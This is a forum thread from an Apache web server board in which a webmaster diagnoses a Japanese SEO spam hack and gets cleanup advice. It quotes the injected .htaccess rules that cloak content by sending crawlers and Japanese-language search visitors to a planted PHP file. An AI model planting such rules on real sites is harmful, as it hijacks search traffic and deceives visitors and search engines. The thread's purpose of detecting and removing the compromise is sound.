1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 11:10 am May 1, 2026

Forum Moderators: phranque

Message Too Old, No Replies

Is this a sign of Hacking

Host and GWT indicates the site is not hacked

         

Lorel

5:04 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have a site that is showing Japanese characters for all text when the the site comes up in a Google search. Yet I can go directly to the site using the domain name and the site looks fine and I can see no excess code on the home page. The hosting company can find no evidence of hacking and no warning in GWT/Search Console. I requested Google to fetch the page and index it and the japanese characters are still showing up. I also changed the password.

However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for Wordpress but the owner has never used Wordpress even though I can see it installed. It has one line for the japanese language so I suspect this is the problem.

Can someone tell me if I remove this section in htaccess (see below) and remove the blog off the server if this will take care of the hacking problem? Should I change the password again once I do this?

RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]

not2easy

7:24 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



If the .htaccess file at the root directory is different from an older copy you (or the owner) have, I would be concerned about that server and consider finding a better host. Especially if this is a shared server, it might have been compromised to allow changes to the .htaccess file (and other files ). If the server itself has been compromised, any new password may be available to the party that made the change in the first place. Can you see the date/timestamp for the htaccess file?

If there is a blog and htaccess changes not made by the site owner or without their knowledge I would certainly want it uninstalled and remove the related lines from the .htaccess file as a start. Be sure there is not a related database left on the server. Much depends on what you find that shouldn't be there, the dates of changes as to whether it is a poorly configured hosting setup or a compromised server. Has the host been contacted, are they aware of the situation?

lucy24

8:51 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for Wordpress but the owner has never used Wordpress even though I can see it installed. It has one line for the japanese language so I suspect this is the problem.

Please tell me your first response was to change the site passwords. 

RewriteCond {various stuff}
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
This is a nonsense rule anyway. What's the capture for, if it isn't going to be used in the redirect? Presumably the php file includes something that looks at FILENAME or REQUEST_URI-- whatever it's called in php-- so there's no need to include it in the URL.

:: irritably thinking that if the rule itself had been properly worded, there would be no need for all that css|js|etcetera stuff in the final condition, which should in any case have been the first condition, not that it's necessary to tell hackers how to improve their work ::

Lorel

10:04 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Instead of waiting for a reply I called the host again and he said go ahead and remove the code from the htaccess file and delete WP. it kept replicating itself so I had to get the host to finish it. And then I changed the password again. Then requested Google re-index the site again and the google results are already recuperating an hour later.

This was apparently caused by the owner having someone install WP 3.1 a year ago without telling me and never finished it so it was never updated. (wasn't even listed in site manager as being installed which was odd). It looks like this was the avenue of access to the site. Plus the site is on an old server that needs to be updated. Not the hosts fault. The owner has just let the site sit idle. There is no database.

Thanks for your help everyone.

topr8

10:16 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



>>Plus the site is on an old server that needs to be updated. Not the hosts fault.

is this a dedicated server run by the client? if not, how is this NOT the host's fault.

martinibuster

2:07 am on Sep 16, 2016 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



how is this NOT the host's fault.


topr8 is right, you are not out of the woods. Your client is still in danger. While the htaccess file was directly related to the old WordPress installation, version 3.1, confirming that the entry point was WordPress and not the unpatched server (we're currently into WordPress version 4.6.1), the server itself may still present a critical problem.

As topr8 implies, your client's problem is not entirely solved. It is critical to get the server software patched up asap because your client's site is sitting on a time bomb.

not2easy

3:01 am on Sep 16, 2016 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



it kept replicating itself

Be sure to remove the sql file that WP creates on install or it can continue to reappear. If the site owner has no databases, there should be none in the account. If the site uses CP, check the software installation tools there and the phpMyAdmin.

engine

8:33 am on Sep 16, 2016 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



On top of what's been mentioned, there are a couple of resources out there that might also help you.

Google's Safe Browsing Site Status [google.com...]

Securi has an online scanner for one-off scans that's free to use, with a more comprehensive paid version.
[sitecheck.sucuri.net...]

And, as has been said, it's important to keep the plugins and software updated. The owner leaving it for a long while without that attention is asking for problems, IMHO.

Lorel

5:36 pm on Sep 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



The site is not on a dedicated server. There is no database. I told the client he needs to upgrade to a new server. I removed all of WP. The site indexing is still is improving in google search. I'll keep watching it to make sure it doesn't reinfect the site.

Thanks for the info everyone.

Lorel

5:37 pm on Sep 16, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



PS. this site was never declared unsafe by Google.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 11:10 am May 1, 2026